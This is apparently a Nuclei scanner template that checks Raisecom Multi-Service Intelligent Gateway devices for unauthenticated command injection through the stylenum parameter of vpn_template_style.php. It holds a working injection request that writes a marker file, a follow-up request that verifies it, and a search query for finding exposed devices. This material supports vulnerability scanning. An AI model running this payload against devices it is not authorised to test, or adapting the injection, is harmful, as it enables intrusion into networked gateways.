id: raisecom-rce
info:
name: Raisecom Gateway vpn_template_style.php - Remote Command Execution
author: 3th1c_yuk1
severity: critical
description: |
The /vpn/vpn_template_style.php endpoint in Raisecom Multi-Service Intelligent Gateway is vulnerable to unauthenticated remote command execution. The stylenum parameter fails to properly sanitize user input, allowing attackers to inject system commands using backticks (`\) or pipe (|`) characters.
impact: |
Successful exploitation allows arbitrary command execution on the target device, enabling actions such as file manipulation or system control. This vulnerability affects multiple instances and does not require authentication.
reference:
- https://github.com/koishi0x01/CVE/blob/main/CVE_1.md
metadata:
verified: true
max-request: 2
fofa-query: '"
Web user login" && ""'
tags: raisecom,rce,intrusive
variables:
string: "{{randstr}}"
filename: "{{to_lower(rand_text_alpha(5))}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Web user login")'
condition: and
internal: true
- raw:
- |
GET /vpn/vpn_template_style.php?mySubmit=true&stylenum=%60echo+-e+%27{{string}}%27%3E/www/tmp/{{filename}}.txt%60 HTTP/1.1
Host: {{Hostname}}
- |
GET /tmp/{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && status_code_2 == 200"
- 'contains(content_type_2, "text/plain")'
- "contains(body_2, '{{string}}')"
condition: and
# digest: 4a0a00473045022011a216917cd6c9fc1e344220960af1480f933667e037fea112031accc2ee17530221009a60cfba8840442f2e15149325455a415b2b83f7ce075c10dc68276f06476b6f:922c64590222798bb761d5b6d8e72950